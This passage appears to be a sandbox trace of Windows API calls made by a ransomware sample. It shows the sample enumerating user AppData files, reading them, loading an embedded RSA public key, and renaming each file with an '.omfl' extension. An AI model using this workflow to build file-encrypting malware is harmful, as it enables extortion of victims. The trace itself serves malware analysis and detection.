dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3220) returned 1 [0135.144] CryptCreateHash (in: hProv=0x49d3220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.144] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.144] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.144] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.145] GetLastError () returned 0x0 [0135.145] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.145] CryptReleaseContext (hProv=0x49d3220, dwFlags=0x0) returned 1 [0135.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.145] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.145] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.145] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.147] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\Data1.cab.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\data1.cab.omfl")) returned 1 [0135.148] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.148] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.148] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.150] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7482788 | out: hHeap=0x4970000) returned 1 [0135.150] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 1 [0135.150] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi") returned=".msi" [0135.150] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.151] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=906752) returned 1 [0135.151] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.153] SetFilePointerEx (in: hFile=0x610, liDistanceToMove=0xdd5da, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0135.153] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0xe00fb78, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb78*=0x26, lpOverlapped=0x0) returned 1 [0135.155] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.155] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0x25805, lpOverlapped=0x0) returned 1 [0135.158] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0135.158] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d3220) returned 1 [0135.159] CryptCreateHash (in: hProv=0x49d3220, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.159] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.159] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.159] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.159] GetLastError () returned 0x0 [0135.159] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.159] CryptReleaseContext (hProv=0x49d3220, dwFlags=0x0) returned 1 [0135.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.159] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.159] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.159] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.159] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.169] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\jre1.7.0_45\\jre1.7.0_45.msi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\sun\\java\\jre1.7.0_45\\jre1.7.0_45.msi.omfl")) returned 1 [0135.170] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.170] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.170] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.171] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7482788 | out: hHeap=0x4970000) returned 1 [0135.171] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68d26e60, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68d26e60, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68d26e60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0xdd600, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jre1.7.0_45.msi", cAlternateFileName="JRE170~1.MSI")) returned 0 [0135.171] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0135.171] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0135.171] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd145f8 | out: hHeap=0x4970000) returned 1 [0135.172] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd148f0 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcf0ad0 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f82a0 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f7fc0 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f86f0 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74f87a8 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d2e68 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14a20 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd14988 | out: hHeap=0x4970000) returned 1 [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd24578 | out: hHeap=0x4970000) returned 1 [0135.172] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\Search\\") returned="Search\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\") returned="10.0\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\") returned="Acrobat\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.172] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.172] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.173] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.173] PathFindFileNameW (pszPath="") returned="" [0135.174] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.174] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.174] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.174] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.175] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.175] PathFindFileNameW (pszPath="") returned="" [0135.177] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.177] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\") returned="36USA68T\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.177] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.178] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.178] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.178] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.178] PathFindFileNameW (pszPath="") returned="" [0135.178] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml") returned=".xml" [0135.178] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.178] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=13) returned 1 [0135.178] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.181] SetFilePointer (in: hFile=0x610, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0135.181] ReadFile (in: hFile=0x610, lpBuffer=0x6ec0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0xe00fb70, lpOverlapped=0x0 | out: lpBuffer=0x6ec0000*, lpNumberOfBytesRead=0xe00fb70*=0xd, lpOverlapped=0x0) returned 1 [0135.182] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA2CioROt6bmGOvgXsxSr4\\\\nJ1m9GLoadXsbehH48h9WqhQX6NJOWbsMp4OKnI7JB20ny+XsrfOQXDUbjqRVjJH4\\\\nN3iD6GIbMPgxtL5NFWbpoCDCO+DnCcpfoiHSZwuntjOJL2bUaJrqHjdPdR8Y7ecm\\\\n4FArEwfDMaeK+zDvPmci8jmkBw\\/tT8ZmCvMFuNcNDEh90zKn17YLaOIygf2X3efa\\\\n5AEGS6zhgvIi6VFClDV4vRa1c1wKrj9hTQ7Mr1imBQ53PO8PYb1IEvkjAkKRT+Y0\\\\nPZ0LPT0+LbBMyUa3GV6ev07SQBBbUwv7BWVuLcPqcstm2mF+BGaO+EyJ2tKrzALS\\\\nCQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 490 [0135.182] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0135.183] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.183] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.183] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.183] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.183] GetLastError () returned 0x0 [0135.183] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.183] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0135.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.183] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.183] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.183] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.183] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.183] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\36USA68T\\imagesrv.adition[1].xml.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\36usa68t\\imagesrv.adition[1].xml.omfl")) returned 1 [0135.184] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.184] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.184] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.185] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e3210 | out: hHeap=0x4970000) returned 1 [0135.185] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x54b05050, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x54b05050, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x54b05050, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xd, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imagesrv.adition[1].xml", cAlternateFileName="IMAGES~1.XML")) returned 0 [0135.186] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0135.186] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0135.186] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6e10 | out: hHeap=0x4970000) returned 1 [0135.186] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0135.186] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\") returned="3O75JDME\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\") returned="DOMStore\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\") returned="Internet Explorer\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0135.186] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0135.187] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0135.187] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0135.187] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0135.187] PathFindFileNameW (pszPath="") returned="" [0135.188] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml") returned=".xml" [0135.188] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0135.189] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=13) returned 1 [0135.189] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0135.192] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2e68) returned 1 [0135.193] CryptCreateHash (in: hProv=0x49d2e68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0135.193] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0135.193] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0135.193] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0135.193] GetLastError () returned 0x0 [0135.193] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0135.193] CryptReleaseContext (hProv=0x49d2e68, dwFlags=0x0) returned 1 [0135.194] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0135.194] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0135.194] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0135.194] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0135.194] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.194] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\Internet Explorer\\DOMStore\\3O75JDME\\www.google[1].xml.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\internet explorer\\domstore\\3o75jdme\\www.google[1].xml.omfl")) returned 1 [0135.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0135.195] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0135.195] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0135.197] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0cd00 | out: hHeap=0x4970000) returned 1 [0135.197] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x605dd8a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, 